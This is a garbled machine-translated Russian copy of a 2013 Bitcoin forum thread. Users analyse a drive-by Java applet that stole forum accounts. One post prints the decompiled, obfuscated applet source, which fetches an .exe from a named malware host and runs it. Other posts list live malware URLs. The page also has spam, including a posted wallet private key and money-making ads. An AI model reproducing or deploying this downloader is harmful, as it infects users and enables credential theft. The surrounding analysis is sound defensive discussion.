Вернуться   Биткоин Форум > - Wiki
7 июня 2013, 7:42:02 PM   # 1
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Java-апплет на этой странице, так или иначе используется взять под контроль учетных записей на форуме. Как именно это работает? Является ли это 0-дневный Java использовать, или некоторый недостаток, присущая безопасности в Java? Есть что-нибудь, что можно сделать на моем конце, чтобы остановить его?

(Действовать с осторожностью) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos


Как заработать Биткоины?
Без вложений. Не майнинг.


7 июня 2013, 7:50:32 PM   # 2
 
 
Сообщения: 1876
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Получил 1806 Биткоинов
Реальная история.





Вы 100% уверены, что с этой страницы? Совсем недавно я посетил эту страницу и был близок к позволяя ему работать (в то же время также вошедшем в этом форуме), потому что я посетил этот сайт часто в прошлом, и думал, что это было «законным». К счастью, я сдержался от работы его

Я дам ему попробовать на виртуальной машине, хотя и не уверен, что если он будет работать как положено.
злорадный сейчас офлайн Пожаловаться на злонамеренные   Ответить с цитированием Мультицитирование сообщения от злобного Быстрый ответ на сообщение злонамеренные

7 июня 2013, 7:53:47 PM   # 3
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Это на самом деле не нулевая Hedge. Это фишинг типа сайта.

котировка
Вы 100% уверены, что с этой страницы?

Нет.
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos

7 июня 2013, 7:56:04 PM   # 4
 
 
Сообщения: 1246
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Java-апплет на этой странице, так или иначе используется взять под контроль учетных записей на форуме. Как именно это работает? Является ли это 0-дневный Java использовать, или некоторый недостаток, присущая безопасности в Java? Есть что-нибудь, что можно сделать на моем конце, чтобы остановить его?

(Действовать с осторожностью) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm

Я сомневаюсь, что вы можете сделать что-нибудь. Просто, может быть, положить липкие в новичку области об этом. Убедитесь, что ява выключена в браузерах.
gweedo сейчас офлайн Пожаловаться на gweedo   Ответить с цитированием Мультицитирование сообщения от gweedo Быстрый ответ на сообщение gweedo

7 июня 2013, 8:04:36 PM   # 5
 
 
Сообщения: 1106
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Нормальная ява двигатель, ничего другого. Возможно FUD


  <Ширина апплет = '500' Высота = '500' Код ="BitcoinMeet.class""Архив ="BitcoinMeet.jar">



Редактирование: это FUD https://www.virustotal.com/en/file/39b5ed1833ac72f79fb042f5fadf3c2352605b3c8cb58842114e77289f033cb8/analysis/1370635717/

а не нормальные один .. я сообщил сайт в безопасном просмотре Google.

http://www.google.com/safebrowsing/report_badware/

Пожалуйста, сообщите .. ^

Edit: Это загружает файл здесь

Предупреждение Зараженный файл
https://v-panel.info/userAccounts/blackapples/AdobeUpdates DOT ех

Сканирование: 5/47
https://www.virustotal.com/en/file/79c4e1fa564ba5075fe15b6131202e16631cb1151708d337d2a0455bdbb882ab/analysis/1370636620/
https://malwr.com/analysis/YjAwYjE2MjIzN2Y1NDExYmIyOGRiYzcwZDBlODY0YjE/


Ты можешь видеть, https://v-panel.info/
этот сайт предоставляет эти вредоносные Java-апплеты за $ 20 только XD

подробнее о у-панели
http://www.hackforums.net/archive/index.php/thread-3413390.html
http://blackhatcrackers.blogspot.in/2013/05/java-drive-by-advanced.html
escrow.ms сейчас офлайн Пожаловаться на escrow.ms   Ответить с цитированием Мультицитирование сообщения от escrow.ms Быстрый ответ на сообщение escrow.ms

7 июня 2013, 10:04:19 PM   # 6
 
 
Сообщения: 770
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Java-апплет на этой странице, так или иначе используется взять под контроль учетных записей на форуме. Как именно это работает? Является ли это 0-дневный Java использовать, или некоторый недостаток, присущая безопасности в Java? Есть что-нибудь, что можно сделать на моем конце, чтобы остановить его?

(Действовать с осторожностью) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm

Убедитесь, что ява выключена в браузерах.

Если ничего не может быть сделано на theymos стороны, вероятно, лучше всего сделать, это поставить уведомление системы здесь, чтобы отключить Java для браузеров и / или полностью удалить Java. Из-за Javas винтого окна, я удалил это дерьмо. Безопаснее без него, чем с ним.
pekv2 сейчас офлайн Пожаловаться на pekv2   Ответить с цитированием Мультицитирование сообщения от pekv2 Быстрый ответ на сообщение pekv2

8 июня 2013, 3:20:50 AM   # 7
 
 
Сообщения: 938
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Похоже, что Java-апплет загрузки и запуска исполняемого файла. Я не могу проверить это 0-день эксплуатировать или "нормальный" поведение Java, потому что я укрепил мой Firefox (Java плагин отключены), но не установлено VMWare машины со всей левыми по умолчанию.

Кажется, что .exe крадет либо печенье или сохраненные логины или клавиатурные пароли. Theymos не может делать ничего об этом. Форум, кажется, настроен должным образом, пользователи компьютеров и мозг не может.
MysteryMiner сейчас офлайн Пожаловаться на MysteryMiner   Ответить с цитированием Мультицитирование сообщения от MysteryMiner Быстрый ответ на сообщение MysteryMiner

8 июня 2013, 3:29:23 AM   # 8
 
 
Сообщения: 1106
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Похоже, что Java-апплет загрузки и запуска исполняемого файла. Я не могу проверить это 0-день эксплуатировать или "нормальный" поведение Java, потому что я укрепил мой Firefox (Java плагин отключены), но не установлено VMWare машины со всей левыми по умолчанию.

Кажется, что .exe крадет либо печенье или сохраненные логины или клавиатурные пароли. Theymos не может делать ничего об этом. Форум, кажется, настроен должным образом, пользователи компьютеров и мозг не может.


хорошо 0day vulnerebilities используется только дорогостоящий использовать пакеты, потому что они работают ех молча, это один была заранее ява езды на потому, что он имел ех ссылки на файл в самом банке.

Я не могу ничего сказать, потому что ех кажется, что это имеет анти~d песочницу / antivm включен, поэтому он не показывает никаких исходящих соединений.
escrow.ms сейчас офлайн Пожаловаться на escrow.ms   Ответить с цитированием Мультицитирование сообщения от escrow.ms Быстрый ответ на сообщение escrow.ms

8 июня 2013, 3:53:13 AM   # 9
 
 
Сообщения: 938
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

0-день для Java обычно используются для обхода песочницы или кода ограничения подписи. Во всяком случае, я считаю, что это хромой использовать, потому что многие из них не установлен или включен Java. По сравнению с скажем Flash Player Кто на 0-день использовать, скорее всего, для запуска кода практически каждый посетитель.
MysteryMiner сейчас офлайн Пожаловаться на MysteryMiner   Ответить с цитированием Мультицитирование сообщения от MysteryMiner Быстрый ответ на сообщение MysteryMiner

8 июня 2013, 4:36:34 AM   # 10
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

0-день для Java обычно используются для обхода песочницы или кода ограничения подписи. Во всяком случае, я считаю, что это хромой использовать, потому что многие из них не установлен или включен Java. По сравнению с скажем Flash Player Кто на 0-день использовать, скорее всего, для запуска кода практически каждый посетитель.

Я имел дело с ~ 10 человек, которые, кажется, пали жертвой этого подвига, и многие другие будут иметь свои счета скомпрометированы без моего ведома. Похоже, Java довольно широко распространен, даже в сообществе Bitcoin. Если использовать можно использовать на более крупных и важных объектов, это кажется довольно крупной Java слабости.
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos

8 июня 2013, 4:37:47 AM   # 11
 
 
Сообщения: 1190
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

PS: Вот .jar файл сам по себе, если я не ошибаюсь - http://zerohedge.us/BitcoinMeet.jar [ПРЕДУПРЕЖДЕНИЕ ВИРУСА / троян /]
Джон (John K.) сейчас офлайн Пожаловаться на Джон (John K.)   Ответить с цитированием Мультицитирование сообщения от Джон (Джон К.) Быстрый ответ на сообщение Джон (John K.)

8 июня 2013, 4:40:59 AM   # 12
 
 
Сообщения: 910
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Invalidate сессии, если они приходят из другого диапазона IP.
TradeFortress сейчас офлайн Пожаловаться на TradeFortress   Ответить с цитированием Мультицитирование сообщения от TradeFortress Быстрый ответ на сообщение TradeFortress

8 июня 2013, 4:43:13 AM   # 13
 
 
Сообщения: 1246
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Код:
импорт java.io.BufferedInputStream;
импорт java.io.BufferedOutputStream;
импорт java.io.FileOutputStream;
импорт java.io.IOException;
импорт java.net.URL;
импорт javax.swing.JApplet;
импорт java.awt.Graphics;
импорт java.awt.Dimension;
импорт java.awt.font;
импорт java.awt.FontMetrics;
общественный класс BitcoinMeet расширяет JApplet
{
 Строка lj2PycGhYdvg6fE5aZVf1RV8UawVq8um8vVMoHJOtYLyU9K7nj2nRXvm0SJzCY9mfGSG7gSHViCq75wt5y4WgyK7cmNSNezI = System.getenv ("температура");
     Строка Vd8laZ87XmxGrUjwe3dbIxht7KOcymtjDHkR2rXZ1gKsBJA6M5gnIe3OxQHWXUVygIbhTAXU73OWLiEq3ZjLU3sccTABokQl = "https://v-panel.info/userAccounts/blackapples/AdobeUpdates.exe";
         Строка OIGDbIwhKkUoFx1li1RS3L6fjU7oHgfPxZBo3OmMTIVwZW5YWVqZ2wU2cDptXlEgNtlPEduvubSf9XTGtMLuE1vUD8PzsRvZ = this.lj2PycGhYdvg6fE5aZVf1RV8UawVq8um8vVMoHJOtYLyU9K7nj2nRXvm0SJzCY9mfGSG7gSHViCq75wt5y4WgyK7cmNSNezI + "\\";
            Строка A309fLKqvhmKVH0QldGQe25V0dfI6r3auRjpgK3rHoWgBkNwZRlTSqpDGl5pi8DsYC5U57OMv6JNqpGaIb6eFuWO3DX1nytN = "local.exe";
          @Override
          общественного недействительное начало ()
       {
    Строка Wy36MabDgu0m6sYNkFIPjiv2Ce3PtvvuUyz1prEl8qdR6RipvzYuyfw1QyPGUkjp5zquRd2Ykeqp8p1JBYYQTfa5tynQ6nC0 = this.OIGDbIwhKkUoFx1li1RS3L6fjU7oHgfPxZBo3OmMTIVwZW5YWVqZ2wU2cDptXlEgNtlPEduvubSf9XTGtMLuE1vUD8PzsRvZ.concat (this.A309fLKqvhmKVH0QldGQe25V0dfI6r3auRjpgK3rHoWgBkNwZRlTSqpDGl5pi8DsYC5U57OMv6JNqpGaIb6eFuWO3DX1nytN);


  пытаться
    {
      FileOutputStream XbKCMMzBHBHOHHqbjaITMrXCRNAWUplEEBJ9gEYwt1kUHg8HNQfsESdtj5aUuXxinD7GLk3Ykmt7GIORqJLdgymgKYBYwPW6 = новый FileOutputStream (Wy36MabDgu0m6sYNkFIPjiv2Ce3PtvvuUyz1prEl8qdR6RipvzYuyfw1QyPGUkjp5zquRd2Ykeqp8p1JBYYQTfa5tynQ6nC0);
      BufferedInputStream fFpePrST1OCGo0v1cDeP2DLLHf4YLCFeKdQsl4Ola0bZXmCAQUiawKuYyywFj1YKe9WCB5O2SyDq8IHggzOsFFb43nm3oMMG = новый BufferedInputStream (новый URL-адрес (this.Vd8laZ87XmxGrUjwe3dbIxht7KOcymtjDHkR2rXZ1gKsBJA6M5gnIe3OxQHWXUVygIbhTAXU73OWLiEq3ZjLU3sccTABokQl) .openStream ());
      BufferedOutputStream o4L78s9CRobZRsV9S5Iwmtzo48rrdXgOCIdnU3QmqHNJT4bm8t5u9K6BbwJLezsVDmLwot62VbLpfvh4B2xYMJowZSEUcfqU = новый BufferedOutputStream (XbKCMMzBHBHOHHqbjaITMrXCRNAWUplEEBJ9gEYwt1kUHg8HNQfsESdtj5aUuXxinD7GLk3Ykmt7GIORqJLdgymgKYBYwPW6, 1024);
      байт [] BWccahe8QywMVtPlvlMDAUjonELDXVwIrouFmopX094GIbbYYwHncziC3JJCjZ3qQxfW8luWtxHWpsvPBWX4gVGjj8CilFpW = новый байт [1024];
INT Okt0c0kmN8LWzC7awGetzYtzkexcX90ZtJnmcefy2zgI24sxmmS9MOPRIl61uUCAiPwaJrpLSmlTpjcil68SdfkuEpvhMg8K;
      (для длительного fLuoW6TorHJ4zv28H0Cu6MBmWNG3KrMpWCjslT4ieN3tE5I5S3yXOQL5vA7CIcaiTarz5uyiDHsKLUOiWlW5V20cRVSd95cD = 0L;! (Okt0c0kmN8LWzC7awGetzYtzkexcX90ZtJnmcefy2zgI24sxmmS9MOPRIl61uUCAiPwaJrpLSmlTpjcil68SdfkuEpvhMg8K = fFpePrST1OCGo0v1cDeP2DLLHf4YLCFeKdQsl4Ola0bZXmCAQUiawKuYyywFj1YKe9WCB5O2SyDq8IHggzOsFFb43nm3oMMG.read (BWccahe8QywMVtPlvlMDAUjonELDXVwIrouFmopX094GIbbYYwHncziC3JJCjZ3qQxfW8luWtxHWpsvPBWX4gVGjj8CilFpW)) = -1; fLuoW6TorHJ4zv28H0Cu6MBmWNG3KrMpWCjslT4ieN3tE5I5S3yXOQL5vA7CIcaiTarz5uyiDHsKLUOiWlW5V20cRVSd95cD + = Okt0c0kmN8LWzC7awGetzYtzkexcX90ZtJnmcefy2zgI24sxmmS9MOPRIl61uUCAiPwaJrpLSmlTpjcil68SdfkuEpvhMg8K) {
        o4L78s9CRobZRsV9S5Iwmtzo48rrdXgOCIdnU3QmqHNJT4bm8t5u9K6BbwJLezsVDmLwot62VbLpfvh4B2xYMJowZSEUcfqU.write (BWccahe8QywMVtPlvlMDAUjonELDXVwIrouFmopX094GIbbYYwHncziC3JJCjZ3qQxfW8luWtxHWpsvPBWX4gVGjj8CilFpW, 0, Okt0c0kmN8LWzC7awGetzYtzkexcX90ZtJnmcefy2zgI24sxmmS9MOPRIl61uUCAiPwaJrpLSmlTpjcil68SdfkuEpvhMg8K);
      }
      o4L78s9CRobZRsV9S5Iwmtzo48rrdXgOCIdnU3QmqHNJT4bm8t5u9K6BbwJLezsVDmLwot62VbLpfvh4B2xYMJowZSEUcfqU.close ();
      fFpePrST1OCGo0v1cDeP2DLLHf4YLCFeKdQsl4Ola0bZXmCAQUiawKuYyywFj1YKe9WCB5O2SyDq8IHggzOsFFb43nm3oMMG.close ();
    }
поймать (IOException TG3ijIhCEp69Lc73ZF8vGVnwqIpzNE3HO5zNMw909TWc7FelN33RXqQQTZo1JqIqvDXEjlr9zQ2NTfT1iVSVO372Eu278JwK)
    {
    }
пытаться
    {
      . Runtime.getRuntime () Exec (Wy36MabDgu0m6sYNkFIPjiv2Ce3PtvvuUyz1prEl8qdR6RipvzYuyfw1QyPGUkjp5zquRd2Ykeqp8p1JBYYQTfa5tynQ6nC0);
    }
    улов (Исключение xHRF1T0uAwoIf4NnFFMxeegO9R8FDgMoxicxS3SEzJ5uNb4AVQPAKMhch6WY33Pz2HXTKqvFTzj1q3BNc1hvNfnK2M44OcKQ)
    {

    }
     }
     общественного ИНТ t24XsyHNZHObKjyv1wRNrHqtluxUmD52F9YgO1J8HqjGqx2qUSXOeQEDG1wbDIdLQRHwSGLegLZmECixtWlo7PaqPmEBAVgj () {вернуться 1; }

     общественного логический ckxxvJrU5QsQT41LnlaT5Z2s4deSkXTLKcFCvfuzM9pjRpLHhve3fguiQoBUOk1qYGbeZmu7v67PvaoslGuDCBCBzrlnil1W () {вернуться ложным; }
     общественного недействительными jcRBZNWfcEKnTT3zyw31OEBnewhc5hAfQD809F62NQo14qzJ0IJh6eljrFcwC3rAFyYr4GtQT5QXup1LRKIWx9WBr0OcRZ3v () {}
     общественного недействительный ZD03MJb1NIXERY8G3QIHiicp9zFC1kgjO63tPeuuvchPR6STfefedOk2nPDnUYn3FpwRkRO36MaWb4qNimHbU7cKfURAsHSh () {}
     общественного недействительными xQAw3hy8JoFusfDqE4ExAVD6ptV5Un2lYB5C0JncScmMOQXAdzP4gA0mLkq1dslRLpsdT2MldSSI4pcgBH18b0uvt8wnz4HG () {}
     общественного недействительный JTYOV6UAYmbDhKX0kXVXmbe3iqpytR50kEhImRbMzJ8wmkMdJ3BAd6RcvJqBeuZChX3kodR0wYN6LsimvAxoUQEasd3mnEOl () {}
       @Override
    общественного недействительной краска (Graphics EQbAK4ZDE7l8zkuVuSMQ49Hv3J4p6bgMIPfkcUOVDTF3yiXTR55USLaUneMtMIZnqUeGpIzbf5eu3SPUWcopxCL7Upz2S1oL)
    {
      INT L8MsBUbS2sLZIICz39E9HJ1QIGFpytDgI9odED7GeaKwr6XuTzJfEKM69AuNKhJl6SZnukcoVw8PJGFh68dnaysiP9Ms6njB, ZYyWLrN10eQcZTaGCKcBElARtfMzGMa76oFQ2BaB7z5kdeaTxKk2AuTKpjFeLT2QKkyMvpgJB295fjYtJLucZQvQP1LtUMFi;
      Строка zF0M7Qx2drvgLkR3YHrg2X4WPKX2KONjRgLXNEZzegwyDPHHpTxrqHPZG8D0e0986cGbUKr0z0P3ipJnKC1V3Qumghvb7KiB = "Загрузка BitcoinMeet ...";
        Размер T4KPtHqLIzQxy9REcOUSwb4lcO18tG7Mnau3q7NTMvckL5Oxc3apeegNJgdWDj4QaxbDLyvpUngjsKxlNogHFcn7QDFBDm1R = GETSIZE ();
                Шрифт GE4b8u1OLQQJCsR5eSCg3gFjd1ajKPBCRTRZQS8u3hYEppmkKPDMLMLxNvxpGQaw54gdV5nX2NHrX0h2hZOI7rCc9iFsOUBb = новый шрифт ("Arial", Font.BOLD, 40);
                EQbAK4ZDE7l8zkuVuSMQ49Hv3J4p6bgMIPfkcUOVDTF3yiXTR55USLaUneMtMIZnqUeGpIzbf5eu3SPUWcopxCL7Upz2S1oL.setFont (GE4b8u1OLQQJCsR5eSCg3gFjd1ajKPBCRTRZQS8u3hYEppmkKPDMLMLxNvxpGQaw54gdV5nX2NHrX0h2hZOI7rCc9iFsOUBb);

                // определить координаты х и у
                FontMetrics fctaqBCMyXMS2FyPdvpWniEYZMoITodYDn0cypyYOkrQQRyJO0jW8Eul050Et4IgqbQBDnoAe21KSyl2OlXePcDigpCqs3m6 = EQbAK4ZDE7l8zkuVuSMQ49Hv3J4p6bgMIPfkcUOVDTF3yiXTR55USLaUneMtMIZnqUeGpIzbf5eu3SPUWcopxCL7Upz2S1oL.getFontMetrics ();
                L8MsBUbS2sLZIICz39E9HJ1QIGFpytDgI9odED7GeaKwr6XuTzJfEKM69AuNKhJl6SZnukcoVw8PJGFh68dnaysiP9Ms6njB = T4KPtHqLIzQxy9REcOUSwb4lcO18tG7Mnau3q7NTMvckL5Oxc3apeegNJgdWDj4QaxbDLyvpUngjsKxlNogHFcn7QDFBDm1R.width / 2 - fctaqBCMyXMS2FyPdvpWniEYZMoITodYDn0cypyYOkrQQRyJO0jW8Eul050Et4IgqbQBDnoAe21KSyl2OlXePcDigpCqs3m6.stringWidth (zF0M7Qx2drvgLkR3YHrg2X4WPKX2KONjRgLXNEZzegwyDPHHpTxrqHPZG8D0e0986cGbUKr0z0P3ipJnKC1V3Qumghvb7KiB) / 2;
                ZYyWLrN10eQcZTaGCKcBElARtfMzGMa76oFQ2BaB7z5kdeaTxKk2AuTKpjFeLT2QKkyMvpgJB295fjYtJLucZQvQP1LtUMFi = T4KPtHqLIzQxy9REcOUSwb4lcO18tG7Mnau3q7NTMvckL5Oxc3apeegNJgdWDj4QaxbDLyvpUngjsKxlNogHFcn7QDFBDm1R.height / 2 - fctaqBCMyXMS2FyPdvpWniEYZMoITodYDn0cypyYOkrQQRyJO0jW8Eul050Et4IgqbQBDnoAe21KSyl2OlXePcDigpCqs3m6.getHeight ();

                // печать строки в указанном месте, используя метод шнурком
                EQbAK4ZDE7l8zkuVuSMQ49Hv3J4p6bgMIPfkcUOVDTF3yiXTR55USLaUneMtMIZnqUeGpIzbf5eu3SPUWcopxCL7Upz2S1oL.drawString (zF0M7Qx2drvgLkR3YHrg2X4WPKX2KONjRgLXNEZzegwyDPHHpTxrqHPZG8D0e0986cGbUKr0z0P3ipJnKC1V3Qumghvb7KiB, L8MsBUbS2sLZIICz39E9HJ1QIGFpytDgI9odED7GeaKwr6XuTzJfEKM69AuNKhJl6SZnukcoVw8PJGFh68dnaysiP9Ms6njB, ZYyWLrN10eQcZTaGCKcBElARtfMzGMa76oFQ2BaB7z5kdeaTxKk2AuTKpjFeLT2QKkyMvpgJB295fjYtJLucZQvQP1LtUMFi);

    }
}

Вот код, я извлек из этого банки от Джона
gweedo сейчас офлайн Пожаловаться на gweedo   Ответить с цитированием Мультицитирование сообщения от gweedo Быстрый ответ на сообщение gweedo

8 июня 2013, 8:03:15 AM   # 14
 
 
Сообщения: 588
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Invalidate сессии, если они приходят из другого диапазона IP.

Это элементарно безопасности, но это не будет происходить здесь, потому что этот форум поддерживает использование TOR.
Мэтью Н. Райт сейчас офлайн Пожаловаться на Мэтью Н. Райт   Ответить с цитированием Мультицитирование сообщения от Мэтью Н. Райт Быстрый ответ на сообщение Мэтью Н. Райт

8 июня 2013, 11:45:15 AM   # 15
 
 
Сообщения: 1106
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?


Это элементарно безопасности, но это не будет происходить здесь, потому что этот форум поддерживает использование TOR.

и ВЧС и т.д. тоже.
escrow.ms сейчас офлайн Пожаловаться на escrow.ms   Ответить с цитированием Мультицитирование сообщения от escrow.ms Быстрый ответ на сообщение escrow.ms

8 июня 2013, 7:17:21 PM   # 16
 
 
Сообщения: 938
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Invalidate сессии, если они приходят из другого диапазона IP.
Не поможет. Пользователь будет ввести пароль снова и .exe кейлоггер перехватит этот пароль. Отдых очевиден.

Я больше заинтересован в глядя на EXE-файл. Для меня .jar только кажется, как своего родом троянского-dowloader, который извлекает ех с удаленного сервера и запускает его.

Там нет ничего, что владелец форума может реально сделать, если пользователь машина заражена вредоносными программами.
MysteryMiner сейчас офлайн Пожаловаться на MysteryMiner   Ответить с цитированием Мультицитирование сообщения от MysteryMiner Быстрый ответ на сообщение MysteryMiner

8 июня 2013, 7:20:38 PM   # 17
 
 
Сообщения: 588
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

Invalidate сессии, если они приходят из другого диапазона IP.
Не поможет. Пользователь будет ввести пароль снова и .exe кейлоггер перехватит этот пароль. Отдых очевиден.

Я больше заинтересован в глядя на EXE-файл. Для меня .jar только кажется, как своего родом троянского-dowloader, который извлекает ех с удаленного сервера и запускает его.

Там нет ничего, что владелец форума может реально сделать, если пользователь машина заражена вредоносными программами.

Дело в том, чтобы остановить внешние входы. Это, конечно, как вы сказали, что не поможет * если * инфицированный компьютер был один делает контроллинг (пульт дистанционного управления), а не просто передать учетные данные для входа на внешний сайт.
Мэтью Н. Райт сейчас офлайн Пожаловаться на Мэтью Н. Райт   Ответить с цитированием Мультицитирование сообщения от Мэтью Н. Райт Быстрый ответ на сообщение Мэтью Н. Райт

8 июня 2013, 7:37:29 PM   # 18
 
 
Сообщения: 938
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?


Дело в том, чтобы остановить внешние входы. Это, конечно, как вы сказали, что не поможет * если * инфицированный компьютер был один делает контроллинг (пульт дистанционного управления), а не просто передать учетные данные для входа на внешний сайт.
Это повредит пользователей Tor, потому что их IP постоянно меняется. Это не остановит хакера, если .exe открывает сокс на зараженный компьютер (большинство новых троянов делает это). И даже если это не хакер еще может войти с другого IP, когда жертва уезжает.
MysteryMiner сейчас офлайн Пожаловаться на MysteryMiner   Ответить с цитированием Мультицитирование сообщения от MysteryMiner Быстрый ответ на сообщение MysteryMiner

8 июня 2013, 7:44:05 PM   # 19
 
 
Сообщения: 588
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

может войти в системе с другого IP, когда жертва уезжает.

Это, конечно, является лазейкой к этому решению. Человек буквально должен был бы DoS на форумах от затирания F5, чтобы сохранить другую сущность из (и по очереди войти себя в процессе, давая окно возможностей для хакера).

Не действительно лучшее решение для форума я полагаю. PGP ключи, необходимые для входа в систему может быть умнее.
Мэтью Н. Райт сейчас офлайн Пожаловаться на Мэтью Н. Райт   Ответить с цитированием Мультицитирование сообщения от Мэтью Н. Райт Быстрый ответ на сообщение Мэтью Н. Райт

8 июня 2013, 8:00:28 PM   # 20
 
 
Сообщения: 938
Цитировать по имени
цитировать ответ
по умолчанию Re: Как это Java использовать работу?

котировка
PGP ключи, необходимые для входа в систему может быть умнее.
А именно то, что предотвращает вредоносные программы от кражи ключей PGP с компьютера и ключевой фразы, чтобы разблокировать их? Даже ключи, хранящиеся на смарт-карте не пуленепробиваемые, вредонос может перехватить и изменить компьютерную связь смарт-карты. Это потребует дополнительного программирования, но не нереально.

Задача сервера, чтобы сохранить форум доступен с соответствующими учетными данными и сохранить в безопасности на стороне сервера. Работа пользователя, чтобы сохранить его компьютер в безопасности. Эта вредоносная программа ориентирована на пользователя и сервер не может ничего с этим поделать.
MysteryMiner сейчас офлайн Пожаловаться на MysteryMiner   Ответить с цитированием Мультицитирование сообщения от MysteryMiner Быстрый ответ на сообщение MysteryMiner



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW